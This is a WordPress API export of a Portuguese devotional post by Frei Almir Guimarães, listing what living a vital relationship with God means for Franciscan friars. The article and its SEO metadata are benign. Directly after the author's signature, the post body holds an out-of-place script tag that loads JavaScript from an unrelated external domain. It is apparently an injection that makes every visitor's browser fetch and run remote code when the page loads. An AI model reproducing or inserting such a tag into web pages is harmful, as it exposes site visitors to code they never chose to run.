{"id":157105,"date":"2018-04-19T07:20:57","date_gmt":"2018-04-19T10:20:57","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=157105"},"modified":"2019-05-21T08:40:00","modified_gmt":"2019-05-21T11:40:00","slug":"vida-fraterna-e-missao-evangelizadora","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html","title":{"rendered":"Viver uma rela\u00e7\u00e3o vital com Deus"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/04\/franciscanamente_190418.jpg\" alt=\"franciscanamente_190418\" width=\"830\" height=\"383\" \/><\/p>\n<blockquote><p>&nbsp;<\/p>\n<p><em>A C\u00faria da Ordem dos Frades Menores publicou, em 2017,\u00a0\u00a0<\/em><em>um texto sob o t\u00edtulo &#8220;<\/em>Ite, nuntiate&#8230;\u00a0 Diretrizes sobre as novas formas de vida e miss\u00e3o na Ordem dos Frades Menores&#8221;.<em>\u00a0 Os autores do texto, numa certa altura da reflex\u00e3o, colocam condi\u00e7\u00f5es para o sucesso de novas formas a serem implementadas.\u00a0 Entre elas est\u00e1 a vida com Deus. Nossa reflex\u00e3o \u00e9 retomada, um pouco modificada, do documento. \u00a0Esse breve texto serve para todos os franciscanos que desejam afervorar-se e sair de vida rotineira de ora\u00e7\u00e3o. S\u00e3o frases t\u00e3o simples e, ao mesmo tempo, t\u00e3o fundamentais para a sa\u00fade dos franciscanos.<\/em><em>\u00a0<\/em><\/p><\/blockquote>\n<p>A vida com Deus est\u00e1 na base de tudo. \u00c9 o cora\u00e7\u00e3o de nossa vida de Frades Menores. \u00c9 a linfa que nos nutre e que nos d\u00e1 for\u00e7a para cada dia rever nossos relacionamentos fraternos. \u00c9 a energia que acende o fogo da miss\u00e3o.<\/p>\n<p>Viver em rela\u00e7\u00e3o vital com Deus significa ter:<\/p>\n<p style=\"padding-left: 30px;\">\u2022 Um cora\u00e7\u00e3o generoso, terno, aberto e dispon\u00edvel, que se deixe traspassar pelo amor de Cristo e pelo amor dos pr\u00f3prios irm\u00e3os, em particular no relacionamento com os mais sofredores; um relacionamento amoroso com Deus misericordioso que repercute num frade que est\u00e1 em paz consigo mesmo e com os irm\u00e3os. A verdadeira paz que vem de Deus, o irm\u00e3o s\u00f3 poder\u00e1 comunica-la se ele mesmo estiver reconciliado. Assim se torna poss\u00edvel promover, no Espirito de Assis, uma cultura da \u201cn\u00e3o viol\u00eancia\u201d, da benevol\u00eancia, da docilidade nas rela\u00e7\u00f5es fraternas, do perd\u00e3o e do respeito pela cria\u00e7\u00e3o, para se tornar, segundo o Evangelho, um semeador e art\u00edfice da paz;<\/p>\n<p style=\"padding-left: 30px;\">\u2022 Uma capacidade de n\u00e3o teimar nas pr\u00f3prias certezas, mas confiar no Senhor que cuida de nossas vidas. \u00c9 o que alguns frades itinerantes j\u00e1 experimentam h\u00e1 alguns anos partindo sem dinheiro e sem saber com anteced\u00eancia onde iriam dormir, confiando plenamente na Provid\u00eancia divina. Em cada uma de suas miss\u00f5es, lhes \u00e9 poss\u00edvel ver como o Senhor se antecipa em cada ponto, velando por eles com grande bondade;<\/p>\n<p style=\"padding-left: 30px;\">\u2022 Uma capacidade de saber descentrar-se para dar lugar a Cristo e de reconhecer que \u00e9 efetivamente ele que conduz a miss\u00e3o e n\u00e3o o pr\u00f3prio frade. As compet\u00eancias de cada um s\u00e3o \u00fateis e muitas vezes bem empregadas, mas \u00e9 importante cuidar que elas n\u00e3o podem ser dissociadas do autor desses talentos recebidos;<\/p>\n<p style=\"padding-left: 30px;\">\u2022 \u00c9 reconhecer, em profundidade, em n\u00edvel pessoal e comunit\u00e1rio que o autor de nossas vidas \u00e9 o Senhor e Cristo e que somos animados pelo sopro de seu Esp\u00edrito. A vida da Fraternidade e de cada um dos irm\u00e3os tem Cristo como fundamento primeiro de solidez e de coes\u00e3o, e n\u00e3o as capacidades e qualidades pessoais deste ou daquele;<\/p>\n<p style=\"padding-left: 30px;\">\u2022 Uma aten\u00e7\u00e3o regular, sincera e renovada \u00e0 medita\u00e7\u00e3o da Palavra de Deus, ao sil\u00eancio e aos tempos de adora\u00e7\u00e3o, cuidando da Leitura orante da Palavra e vivendo com intensidade a Liturgia sempre com abertura para a evangeliza\u00e7\u00e3o;<\/p>\n<p style=\"padding-left: 30px;\">\u2022 Um amor pela Igreja, seus santos e santas e, em particular pela Virgem Maria.<\/p>\n<p><strong>Frei Almir Guimar\u00e3es<\/strong><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Artigo de Frei Almir Guimar\u00e3es<\/p>\n","protected":false},"author":1,"featured_media":175924,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[11],"tags":[107],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Viver uma rela\u00e7\u00e3o vital com Deus - Carisma - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Viver uma rela\u00e7\u00e3o vital com Deus - Carisma - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Artigo de Frei Almir Guimar\u00e3es\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html\" \/>\n<meta property=\"og:site_name\" content=\"Carisma - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-04-19T10:20:57+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-05-21T11:40:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/04\/franciscanamente_190418.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/carisma\/\",\"name\":\"Carisma - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/carisma\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/04\/franciscanamente_190418.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/04\/franciscanamente_190418.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html\",\"name\":\"Viver uma rela\u00e7\u00e3o vital com Deus - Carisma - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html#primaryimage\"},\"datePublished\":\"2018-04-19T10:20:57+00:00\",\"dateModified\":\"2019-05-21T11:40:00+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/e352342a457f086dc6152f9c73a3d093\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/carisma\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Viver uma rela\u00e7\u00e3o vital com Deus\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/e352342a457f086dc6152f9c73a3d093\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/carisma\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Viver uma rela\u00e7\u00e3o vital com Deus - Carisma - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html","og_locale":"pt_BR","og_type":"article","og_title":"Viver uma rela\u00e7\u00e3o vital com Deus - Carisma - Franciscanos","og_description":"Artigo de Frei Almir Guimar\u00e3es","og_url":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html","og_site_name":"Carisma - Franciscanos","article_published_time":"2018-04-19T10:20:57+00:00","article_modified_time":"2019-05-21T11:40:00+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/04\/franciscanamente_190418.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/carisma\/#website","url":"https:\/\/franciscanos.org.br\/carisma\/","name":"Carisma - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/carisma\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html#primaryimage","url":"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/04\/franciscanamente_190418.jpg","contentUrl":"https:\/\/franciscanos.org.br\/carisma\/wp-content\/uploads\/2018\/04\/franciscanamente_190418.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html#webpage","url":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html","name":"Viver uma rela\u00e7\u00e3o vital com Deus - Carisma - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/carisma\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html#primaryimage"},"datePublished":"2018-04-19T10:20:57+00:00","dateModified":"2019-05-21T11:40:00+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/e352342a457f086dc6152f9c73a3d093"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/carisma\/vida-fraterna-e-missao-evangelizadora.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/carisma"},{"@type":"ListItem","position":2,"name":"Viver uma rela\u00e7\u00e3o vital com Deus"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/e352342a457f086dc6152f9c73a3d093","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/carisma\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/carisma\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/posts\/157105"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/comments?post=157105"}],"version-history":[{"count":1,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/posts\/157105\/revisions"}],"predecessor-version":[{"id":175925,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/posts\/157105\/revisions\/175925"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/media\/175924"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/media?parent=157105"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/categories?post=157105"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/carisma\/wp-json\/wp\/v2\/tags?post=157105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}